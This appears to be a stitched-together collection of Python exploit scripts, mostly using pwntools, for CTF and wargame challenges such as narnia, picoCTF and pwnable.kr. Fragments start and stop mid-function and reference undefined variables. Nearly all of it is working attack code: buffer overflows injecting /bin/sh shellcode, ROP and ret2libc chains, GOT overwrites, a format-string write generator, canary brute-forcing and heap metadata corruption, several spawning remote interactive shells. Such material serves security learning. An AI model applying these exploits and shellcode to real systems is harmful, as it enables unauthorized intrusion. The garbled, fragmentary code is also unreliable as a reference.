flag = "iB6WcuCG3nq+fZkoGgneegMtA5SRRL9yH0vUeN56FgbikZFE1HhTM9R4tZPghhYGFgbUeHB4tEKRRNR4Ymu0OwljQwmRRNR4jWBweOKRRyCRRAljLGQ="
flag = b64decode(flag)
def enc(s, e=9517, n=41117):
new_s = []
for c in s:
new_s.append(pow(ord(c), e, n))
return new_s
solution = ""
flag_i = 0
while flag_i < len(flag):
for i in range(32, 128):
p = p32(enc(chr(i))[0]).replace('\x00', '')
if "\x88" in p:
for j in p:
print ord(j),
print
good = True
for j in range(len(p)):
if p[j] != flag[flag_i + j]:
good = False
break
if good:
solution += p
print(solution)
break
"\xe0\xff\xbd\x27"\
"\xd7\xff\x0f\x24"\
"\x27\x78\xe0\x01"\
"\x21\x20\xef\x03"\
"\xe8\xff\xa4\xaf"\
"\xec\xff\xa0\xaf"\
"\xe8\xff\xa5\x23"\
"\xab\x0f\x02\x24"\
"\x0c\x01\x01\x01"\
"/bin/sh\x00"
nop = "\xff\xff\x06\x28"
shellcode = nop * 100 + shellcode
payload = b"GET %\x00A"
pattern = bytearray(cyclic(1000))
read_buffer = 0x7fffe974
shellcode_offset = 60 # must be a multple of 4
shellcode_addr = read_buffer + shellcode_offset + 4 * 40
pattern[36:40] = p.p32(shellcode_addr)
pattern[41] = b"\x00" # end urldecode loop
payload += pattern
payload = bytearray(payload)
payload[shellcode_offset:shellcode_offset+len(shellcode)] = shellcode
r = p.remote("breizhctf.serveur.io", 4242)
r.send(payload)
r.interactive()
def fmtstr_payload(offset, writes, numbwritten=0, write_size='short'):
# 'byte' : (number, step, mask, format, decalage)
config = {
32: {
'byte': (4, 1, 0xff, 8),
'short': (2, 2, 0xffff, 16),
'int': (1, 4, 0xffffffff, 32),
},
64: {
'byte': (8, 1, 0xff, 8),
'short': (4, 2, 0xffff, 16),
'int': (2, 4, 0xffffffff, 32)
}
}
if write_size not in ['byte', 'short', 'int']:
log.error("write_size must be 'byte', 'short' or 'int'")
number, step, mask, decalage = config[context.bits][write_size]
def _split_write(what, where, mask, decalage, step):
# I don't know exactly why I need this, is it signed value?
# I failed to write things when I deleted this at some strange point.
write_value_limit = (1 << (decalage - 1)) - 1 if mask != 0xff else 0xff
value = what & mask
this_where = where
this_writes = {}
while True:
if value >= write_value_limit:
values = _split_write(value, this_where, mask >> 8,
decalage >> 1, step >> 1)
this_writes.update(values)
else:
this_writes[this_where] = (value, step)
what >>= decalage
value = what & mask
this_where += step
if not what:
break
return this_writes
splitted_writes = {}
for where, what in writes.items():
splitted_writes.update(_split_write(what, where, mask, decalage, step))
#for where, what in splitted_writes.items():
# print("write {} at {}".format(hex(what[0]), hex(where)))
def _get_formatz(size):
if size == 1:
return 'hh'
elif size == 2:
return 'h'
elif size == 4:
return ''
else:
raise Exception("internal error, write size wrong")
payload = ""
blank_chars = 0
write_addr_seq = []
for where, what_thing in sorted(splitted_writes.items(),
key=lambda x: x[1][0]):
what = what_thing[0]
what_size = what_thing[1]
need_write_chars = what - numbwritten
if need_write_chars:
payload += "%{}c".format(need_write_chars)
formatz = _get_formatz(what_size)
payload += "%{}$" + formatz + "n"
numbwritten += need_write_chars
blank_chars += 2
write_addr_seq.append(where)
if len(payload) < 8:
payload = payload.ljust(8, 'a')
buf_written = len(payload)
addr_size = 8 if context.bits == 64 else 4
filled_len = ((buf_written - 1) & ~(addr_size - 1)) + addr_size
ok = False
now_filled_len = filled_len
while not ok:
real_index_in_chars = 0
index_start = offset + (now_filled_len / addr_size)
index_end = offset + (now_filled_len /
addr_size) + len(splitted_writes)
for i in range(index_start, index_end):
real_index_in_chars += len(str(i))
buf_written += real_index_in_chars - blank_chars
blank_chars = real_index_in_chars
now_filled_len = ((buf_written - 1) & ~(addr_size - 1)) + addr_size
if now_filled_len == filled_len:
ok = True
filled_len = now_filled_len
payload += 'a' * (now_filled_len - buf_written)
write_indexes = []
for i in range(index_start, index_end):
write_indexes.append(i)
payload = payload.format(*write_indexes)
for where in write_addr_seq:
payload += p64(where) if context.bits == 64 else p32(where)
return payload
#! /usr/bin/env python3
import pwn
s = pwn.ssh('narnia2',
'narnia.labs.overthewire.org',
password='******',
port=2226)
ShellCode = pwn.asm(
pwn.shellcraft.i386.linux.setreuid(14003) + pwn.shellcraft.i386.linux.sh())
n = pwn.cyclic_find(0x6261616b)
arg = (b'\x90' * n + ShellCode)[-n:] + pwn.p32(0xffffddc0 + 20)
p = s.process([b'/narnia/narnia2', arg])
p.sendline(b"cat /etc/narnia_pass/narnia3")
print(p.recvline())
s.close()
#!/usr/bin/python
import pwn
payload = ""
payload += "A"*76 # ret gets overwritten at offset 76 into our buffer
payload += pwn.p32(0x80483f4) # the win function is located at 0x80483f4
p = pwn.process("bin/stack4")
p.sendline(payload)
print p.recvall()
#! /usr/bin/env python3
import pwn
s = pwn.ssh('narnia0',
'narnia.labs.overthewire.org',
password='******',
port=2226)
p = s.process('/narnia/narnia0')
p.sendline(b"A" * pwn.cyclic_find(0x61616166) + pwn.p32(0xdeadbeef))
p.sendline(b"cat /etc/narnia_pass/narnia1")
p.recvuntil("val: 0xdeadbeef\n")
print(p.recvline())
p.close()
s.close()
add_product('a', 10)
add_product('b', 11)
add_product('c', 12)
add_product('d', 13)
add_product('e', 14)
add_product('f', 15)
manage_product('a')
manage_product('b')
manage_product('c')
manage_product('d')
manage_product('e')
manage_product('f')
remove_product('d')
buf = ''
buf += pwn.p32(9) # price
buf += pwn.p32(0xdeadbeef) # next
buf += pwn.p32(0xdeadbeef) # prev
buf += pwn.p32(0x804C1C0) # parent
buf += pwn.p32(0x804C3E0 - 24) # left
buf += pwn.p32(0x804C3E0 - 24) # right
buf += pwn.cyclic(8) + 'BBBB'
profile(buf)
r.recvuntil('Input: ')
r.send('4\n')
print r.recvuntil('Input: ')
r.send('4\n')
print r.recvuntil('Input: ')
r.send(data)
r.recvuntil('\n')
## STEP 1 - connect and leak GOT
r = connect()
pwn.log.info("Leaking GOT")
# Create duplicate note, thereby free()ing note A
note_add(r, 'a', False)
note_add(r, 'b')
time.sleep(0.1)
# Create a note structure
n = ""
n += pwn.p32(0) # no next note
n += pwn.p32(2137) # ID 2137
n += pwn.p32(1) # data length 1
n += pwn.p32(GOT_FREE) # data pointing to free@got
n += "a" * 40 + "\x00" # timestring
# Add a new note with n as data, thereby overflowing the A note memory with
# our crafted structure
note_add(r, n, False)
# Show notes, parse note a content as free@libc
menu(r, 1)
data = r.recvuntil('\n')
for line in data.split('\n'):
note = line.split()[2]
note = note.split(':')[1]
free = pwn.u32(note[:4])
print("No address found")
address = address_match.groups()[0]
address_val = int(address, 16)
p.send_raw(b'\n')
time.sleep(sleep_time)
out = recv_all_if_exists(p)
print(out.decode("ISO-8859-1"))
format_string = create_format_string(address_val, offset=1).encode()
# format_string = r'%.2044x%1\$hn%.33820x%2\$hn'.encode()
# tweet(pwn.p32(0x8048c20) + format_string, p)
# tweet(pwn.p32(address_val)*4, p)
tweet(pwn.p32(address_val + 2) + pwn.p32(address_val) + format_string, p)
# tweet(pwn.p32(0x08048c20) + b"%08x.%08x.%08x", p)
time.sleep(sleep_time)
p.send_raw(b'\n')
time.sleep(sleep_time)
out = recv_all_if_exists(p)
print(out.decode("ISO-8859-1"))
p.send_raw(b'2\n')
time.sleep(sleep_time)
p.send_raw(b'2\n')
time.sleep(sleep_time)
out = recv_all_if_exists(p)
print(out.decode("ISO-8859-1"))
def random_bytes():
while True:
raw = random.randint(1, 0xffffffff)
if raw not in cs:
return ''.join(['.byte 0x%02x;' % ord(i) for i in pwn.p32(raw)])
#!/usr/bin/python
import subprocess
import pwn
for i in range(1, 256):
b = 'a' * 32 + 'w' + 'r' + 'v' + 'W' + 'aaaa' + pwn.p32(0x000007ed, endian = 'little')
print b
a = subprocess.Popen(["printf", '36\n{}\n'.format(b)], stdout = subprocess.PIPE)
b = subprocess.call(['./vuln'], stdin = a.stdout )
print b
canary value = 'wrvW'
echo '36 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwrvW'
from zio import *
import pwn
# p = zio("./pwn")
p = zio(("192.168.5.56",8888))
# p.read_until("\n")
p.write("a"*(0x60)+pwn.p32(0x0804A024)+pwn.p32(0x0804A024))
# p.read_until("e1 : ")
# p.write(str(0x528E6))
# p.read_until("e2 : ")
# p.write(str(0xCC07C9))
p.interact()
b2_address = int(m.group(2), 16)
pwn.log.info("Buffers at {:08x} and {:08x}".format(b1_address, b2_address))
# 16 bytes of local buffer, 9 bytes of canary, 0xc bytes of local crud
OVERFLOW_SIZE = 16 + 9 + 0xc
shellcode = pwn.asm(pwn.shellcraft.i386.linux.sh())
if '\x00' in shellcode:
raise Exception("Null byte in shellcode.")
if len(shellcode) > OVERFLOW_SIZE:
raise Exception("Shellcode too long.")
b1 = ""
b1 += shellcode.rjust(OVERFLOW_SIZE, 'a')
b1 += pwn.p32(0xdeadbeef) # ebp control
b1 += pwn.p32(b1_address) # eip control
b1 += pwn.p32(CANARY) # copy dest address
b1 += pwn.p32(b2_address) # copy source address
b2 = b1[16:]
p.sendline(b1)
p.sendline(b2)
_ = p.recvline()
_ = p.recvline()
_ = p.recvline()
_ = p.recvline()
pwn.log.info("Got shell!")
p.interactive()
DEBUG = False
if DEBUG:
p = pwn.process('./gunzipasaservice')
else:
p = pwn.remote(HOST, PORT)
pwn.context.log_level = 'DEBUG'
read_plt = 0x08049040
execl_plt = 0x080490B0
pop_pop_pop_ret = 0x08049479
bss = 0x0804C048
payload = b'A' * 0x418
payload += pwn.p32(read_plt)
payload += pwn.p32(pop_pop_pop_ret)
payload += pwn.p32(0)
payload += pwn.p32(bss)
payload += pwn.p32(8)
payload += pwn.p32(execl_plt)
payload += b'AAAA'
payload += pwn.p32(bss)
payload += pwn.p32(0)
payload = gzip.compress(payload)
assert len(payload) <= 0x200
payload = payload.ljust(0x200, b'\x00')
p.send(payload)
#!/usr/bin/env python3
import pwn
host, port = "mercury.picoctf.net", 33411
flag = []
flag_ascii = []
flag_offset_dword = 15
pwn.context.log_level = 'critical'
bad_chars = ['\x00', 'Ć', 'Ćæ']
for i in range(flag_offset_dword, 25):
s = pwn.remote(host, port)
s.sendlineafter("2) View my portfolio\n", "1")
s.sendlineafter("What is your API token?\n", f'%{i}$p')
s.recvuntil("Buying stonks with token:\n")
response = s.recvline()
try:
flag_so_far = pwn.p32(int(response.decode(), base=16))
flag_ascii += flag_so_far
except SyntaxError:
pass
for i in flag_ascii:
flag.append(str(chr(int(i))))
print(''.join(flag).replace('\x00', '').replace('Ć', '').replace(
'Ćæ', '')) # picoCTF{I_l05t_4ll_my_m0n3y_a24c14a6}
def zero_send(data):
magic = '\xdd'
data_len = p32(len(data), endian='big')
data_crc32 = p32(crc.crc_32(data), endian='big')
payload = magic + data_len + data + data_crc32
send(payload)
def main():
p = get_process()
# Stage 1
# Initial payload
payload = b"A" * ExploitInfo.offset_buf_to_eip
ropchain = p32(ExploitInfo.puts_plt)
ropchain += p32(ExploitInfo.main_func)
ropchain += p32(ExploitInfo.puts_got)
payload = payload + ropchain
p.clean()
p.sendline(payload)
# Take 4 bytes of the output
leak = p.recv(4)
puts_addr = u32(leak)
log.info("Here the leak : %s" % binascii.hexlify(leak))
log.info("puts is at : 0x%x" % puts_addr)
p.clean()
# Calculate libc base
libc_base = puts_addr - ExploitInfo.offset_puts
log.info("libc base : 0x%x" % libc_base)
# Stage 2
# Calculate offsets
system_addr = libc_base + ExploitInfo.offset_system + 3 # +3 to avoid null byte on address
"""
Part of system:
0xf7e0d200 <+0>: sub esp,0xc
0xf7e0d203 <+3>: mov eax,DWORD PTR [esp+0x10]
0xf7e0d207 <+7>: call 0xf7f0737d
"""
padding = '\x90' * 0xc # cause we jump from first instruction
exit_addr = libc_base + ExploitInfo.offset_exit
binsh_addr = libc_base + ExploitInfo.offset_str_bin_sh
log.info("system is at : 0x%x" % system_addr)
log.info("/bin/sh is at : 0x%x" % binsh_addr)
log.info("exit is at : 0x%x" % exit_addr)
# Build 2nd payload
payload2 = b"A" * ExploitInfo.offset_buf_to_eip
ropchain2 = p32(system_addr)
ropchain2 += padding
ropchain2 += p32(exit_addr)
# Optional: Fix disallowed character by scanf by using p32(binsh_addr+5)
# Then you'll execute system("sh")
ropchain2 += p32(binsh_addr)
payload2 = payload2 + ropchain2
if b'\x00' in payload2:
log.warn('WARNING: null in payload\n' 'Exploit may fail.')
p.sendline(payload2)
log.success("Here comes the shell!")
p.clean()
p.interactive()
r2.cmd('dbm product_key 0x976')
r2.cmd('dc')
checksum = int(r2.cmd('dr eax'),16)
close()
return checksum
def concat_key(key):
assert type(key) is list
key_str = ''
for i in range(0, len(key), 4):
key_str += key[i] + key[i+1] + key[i+2] + key[i+3] + '-'
return key_str.strip('-')
checksum = p32(calculate_checksum('i-am-misakiakeno'))
goal = b'i-am-misakiakeno' + checksum
discovered = 0
key = ['A']*32
# NOTE: This ended up being WAY too slow...
for x in product(alphabet, alphabet):
# Update our key
key[discovered] = x[0]
key[discovered+1] = x[1]
out = show_decode(concat_key(key))
if out[int(discovered/2)] == goal[int(discovered/2)]:
discovered += 2
import pwn
# mem address of libc and /bin/sh
# got from 'p system' and 'searchmem "/bin/sh" respectively in gdb
system_addr = 0xb7e61310
binsh_addr = 0xb7f83d4c
p = pwn.process('/levels/lab05/lab5C')
print(p.recv(100))
exploit_str = 'a' * 156
exploit_str += pwn.p32(system_addr)
exploit_str += 'SH!T' # 4 bytes of junk
exploit_str += pwn.p32(binsh_addr)
p.sendline(exploit_str)
p.interactive()
p.sendline(payload1)
prompt = p.read()
payload = b''
payload += ('D' * 32).encode()
payload += canary.encode()
payload += chr(char).encode()
p.send_raw(payload)
message = p.read()
if re.search(b'Smashing', message) is None:
canary += chr(char)
if len(canary) == 4:
p.close()
finished = True
break
p.close()
p = pwn.tubes.process.process(["./vuln"], shell=True)
p.sendline(b'64')
prompt = p.read()
print(prompt)
payload = ('D' * 32).encode()
payload += canary.encode()
payload += pwn.p32(win_addr) * 5
p.sendline(payload)
prompt = p.read()
print(prompt)
elf = pwn.ELF('./program')
plt_puts = elf.symbols['plt.puts']
got_puts = elf.symbols['got.puts']
main = elf.symbols['main']
ret = 0x8049022 # gadgets try ROPgadget
pwn.log.success('plt.puts: {}'.format(hex(plt_puts)))
pwn.log.success('got.puts: {}'.format(hex(got_puts)))
pwn.log.success('main: {}'.format(hex(main)))
pwn.log.success('ret: {}'.format(hex(ret)))
payload = ''
payload += 'A' * 172
payload += pwn.p32(ret)
payload += pwn.p32(plt_puts)
payload += pwn.p32(main)
payload += pwn.p32(got_puts)
open('payload-step1.txt', 'w').write(payload)
p = elf.process()
line = p.recvline()
p.sendline(payload)
line = p.recvline()
open('leak.txt', 'w').write(line.strip()) # try hexdump here
addr = hex(pwn.u32(line.strip()[0:4]))
leaked_puts_got = int(addr, 16)
"""
def getPass(shell):
# this function prints the password
print('The password for the next level is...')
shell.sendline('cat /etc/narnia*/narnia' + str(level + 1))
def readCode(shell):
# this function downloads the narnialevel.c file and displays it
# and at the end removes the .c file
code = shell.download_data('/narnia/' + user + '.c')
shell.download_file('/narnia/' + user + '.c')
log.info('The code for this level is')
print(code)
subprocess.call(['rm', user + '.c'])
# context=(arch='i386', os='linux')
sh = conn()
readCode(sh)
exe = sh.run('/narnia/' + user)
exe.recvuntil(':')
# the payload that is to be sent
payload = 'a' * 20 + p32(0xdeadbeef)
exe.sendline(payload)
# the flag is gotten
flag = getPass(exe)
# puts it into interactive mode so you can play around
exe.interactive()
def set_ebx(value):
return p32(0x080481ec)\
+ p32(value)
import pwn
import re
puts_addr = 0xf7e3e290
system_addr = 0xf7e12420
offset = puts_addr - system_addr
elf = pwn.ELF('./vuln')
p = elf.process()
prompt = p.recv()
# print prompt
puts = int(re.findall("puts: (.*)", prompt)[0], 16)
bin_bash = int(re.findall("useful_string: (.*)", prompt)[0], 16)
print "=================="
print puts
print bin_bash
system = puts - offset
payload = 'a' * 160
payload += pwn.p32(system)
payload += "JUNK"
payload += pwn.p32(bin_bash)
p.sendline(payload)
p.interactive()
def set_eax(value):
return p32(0x080c28c6)\
+ p32(value)
#!/usr/bin/env python3
import pwn
s = pwn.ssh('login', 'host.com', password='******', port=12345)
s.download("./exp2")
shell_func_addr = pwn.ELF('./exp2').symbols['shell']
print('Shell func addr :' + str(hex(shell_func_addr)))
p = s.process('exp2')
p.sendline((b'A' * 128) + pwn.p32(shell_func_addr))
p.sendline(b'cat .passwd')
print(p.recvline())
print(p.recvline())
print(p.recvline())
print(p.recvline())
print(p.recvline())
print(p.recvline())
p.close()
def set_ecx(value):
return p32(0x080e3c2a)\
+ p32(value)
#!/usr/bin/env python import pwn ssh = pwn.ssh(host='pwnable.kr', user='******', password='******', port=2222) attack = ssh.process(executable='./passcode') got_fflush = 0x0804a004 addr_before_sys = '134514147' payload = 96 * 'a' payload += pwn.p32(got_fflush) payload += addr_before_sys print attack.recv() attack.sendline(payload) flag = attack.recvall() print flag
def set_edx(value):
return p32(0x080551ca)\
+ p32(value)
SHELL_CODE = b'\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78'
SHELL_LEN = len(SHELL_CODE)
p = pwn.remote('host',12345)
### leak buffer addr
p.recvuntil(b'dump:')
p.sendline(pwn.cyclic(16))
p.recvline()
SHELL_ADDR = p.recvline()[0:10]
p.recvuntil(b'(y/n):')
p.sendline(b'y')
### send payload
p.recvuntil(b'dump:')
n = pwn.cyclic_find(0x62616170)
payload = SHELL_CODE
payload += b'A'*(n - SHELL_LEN + 4)
payload += pwn.p32(int(SHELL_ADDR,0))
payload += b'A'*8
p.sendline(payload)
print(b'payload: ' + payload)
### get shell
p.recvuntil(b'(y/n):')
p.sendline(b'n')
p.interactive()
def set_mem(addr, value):
return set_edx(addr)\
+ set_eax(value)\
+ p32(0x0808ee3d)
#!/usr/bin/env python3
import pwn
s = pwn.ssh('login', 'host', password='******', port=12345)
p = s.process('exp4')
p.recvuntil(b'Enter your name:')
print(b'Enter your name:')
print(b'Sending payload ...')
p.sendline(b'\x08' * 4 + pwn.p32(0xbffffabc))
p.interactive()
def syscall():
return p32(0x08049449)
def p32(h):
return pwn.p32(h)
#!/usr/bin/python
import pwn
#[0x08048370]> afl
#0x080482e0 3 48 sym._init
#0x08048320 1 6 loc.imp.__gmon_start__
#0x08048330 1 6 sym.imp.gets
#0x08048340 1 6 sym.imp.__libc_start_main
#0x08048350 1 6 sym.imp.printf
#0x08048360 1 6 sym.imp.puts
#0x08048370 1 33 entry0
#0x080483a0 6 85 sym.__do_global_dtors_aux
#0x08048400 4 35 sym.frame_dummy
#0x08048424 1 20 sym.win
#0x08048438 3 65 sym.main
#0x08048480 1 5 sym.__libc_csu_fini
#0x08048490 4 90 sym.__libc_csu_init
#0x080484ea 1 4 sym.__i686.get_pc_thunk.bx
#0x080484f0 4 42 sym.__do_global_ctors_aux
payload = ""
payload += "A"*64
payload += pwn.p32(0x08048424)
p = pwn.process("bin/stack3")
p.sendline(payload)
print p.recvall()
s.send(data)
return s
s = connect('')
s.recvuntil('Set-Cookie:')
cookies = s.recvuntil('\n')
sid = cookies.split('=')[1].strip()
pwn.log.info("SID: {}".format(sid))
s = connect('action=1&user=admin&pass=hardcodedpass!', sid=sid)
s.recvall()
s = connect('', sid=sid)
data = s.recvall()
if not 'Surprisingly' in data:
print data
raise Exception()
# 7ffd6000-7fff7000 rwxp 00000000 00:00 0 [stack]
buf = "lang="
buf += 'b'*112
buf += pwn.p32(0x7fff6b88)
buf += SHELLCODE
s = connect('action=2', sid=sid, data=buf)
s.recvall()
s = connect('', sid=sid, gdb=True)
import pwn
import re
addr = "vortex.labs.overthewire.org"
port = "5842"
r = pwn.remote(addr,port)
num = []
for i in range(4):
num += [pwn.u32(r.recvn(4))]
r.send(pwn.p32(sum(num) & 0xFFFFFFFF))
rcv = r.recvall()
passwd = re.findall("Password: (.*)", rcv)
print passwd[0]
